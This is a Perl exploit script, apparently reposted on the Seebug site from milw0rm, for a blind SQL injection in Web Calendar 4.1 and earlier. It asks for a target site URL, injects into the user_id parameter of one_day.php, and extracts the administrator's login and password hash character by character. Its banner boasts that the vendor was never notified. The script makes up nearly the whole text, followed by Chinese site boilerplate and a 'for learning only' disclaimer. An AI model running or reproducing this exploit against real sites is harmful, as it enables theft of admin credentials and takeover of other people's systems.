#!/usr/bin/perl use strict; use LWP::Simple; print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n"; print "-+-- --+-\n"; print "-+-- Discovered && Coded By t0pP8uZz --+-\n"; print "-+-- Discovered On: 24 April 2008 --+-\n"; print "-+-- --+-\n"; print "-+-- Web Calendar suffers from a insecure mysql query --+-\n"; print "-+-- the vendor has not been notified.. and wont be.. --+-\n"; print "-+-- --+-\n"; print "-+-- Exploit tested in ActivePerl --+-\n"; print "-+-- --+-\n"; print "-+--[ Web Calendar <= 4.1 Blind SQL Injection Exploit ]--+-\n"; print "\nEnter URL (ie: http://site.com/webcal/): "; chomp(my $url=<STDIN>); print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while($lop) { $content = get($url."/one_day.php?user_id=1 AND ASCII(SUBSTRING((SELECT CONCAT(login,char(58),password,char(94)) FROM T_AUTH WHERE role_id=1 LIMIT 0,1),".$sub.",1))=".$num."/*"); if($content !~ /you are not in database/i && $num == 94) { $lop = 0; } elsif($content !~ /you are not in database/i) { $res .= chr($num); $num = 48; $sub++; print $res."\n"; } else { $num++; } } print "\nExploit Successfull! Admin Details Are: ".$res; # Coded by t0pP8uZz # milw0rm.com [2008-04-22]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论